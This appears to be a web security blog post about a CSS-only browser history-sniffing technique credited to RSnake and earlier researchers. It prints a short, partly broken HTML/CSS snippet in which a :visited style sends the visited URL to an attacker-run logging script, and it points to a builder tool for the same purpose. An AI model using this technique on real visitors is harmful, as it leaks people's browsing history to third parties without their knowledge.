I don’t know why but at least in the community of web hackers, there’s not a continuity in releasing stuff at all. Sometime there’s nearly nothing interesting for about a week or two and the as soon as someone post something cool, everyone have something to release, just as I already said: I don’t know why

Anyway, this time RSnake has done a very good job in investigation of JavaScript-less web hacking. He found a way to use some kind of the CSS History Hack which was originally found by Jeremiah Grossman but without the use of any line of Javascript. Here you can find RSnake’s blog post on that. By the way, we have to say that Markus Jakobsson, Tom N. Jagatic, and Sid Stamm found this issue already but nobody of us had seen it, shame on us and read their original post.

Now let’s have a look on this non Javascript technique:

First, we need a server side script which just stores all requests on it into a database, a logfile or somewhere else. Then we have a website with a source like the following:

<html><head><style>
a:visited #s0 {background:url("http://[domain].com/[the_script]?url=

</style></head><body>
<a xhref="http://www.disenchant.ch/"><span id="s0">visited</span></a>
</body></html>

With this simple code, everyone who visits this website will send a request to our prepared server side script, which can then log, that user with token xyz has already visited disenchant.ch but of course this could be every site you can imagine. Once more, very cool stuff from RSnake.

For the guys (and of course girls ) of you who like to try out that stuff and don’t want to write their own code, you can use the Noscript HScan builder written by pdp.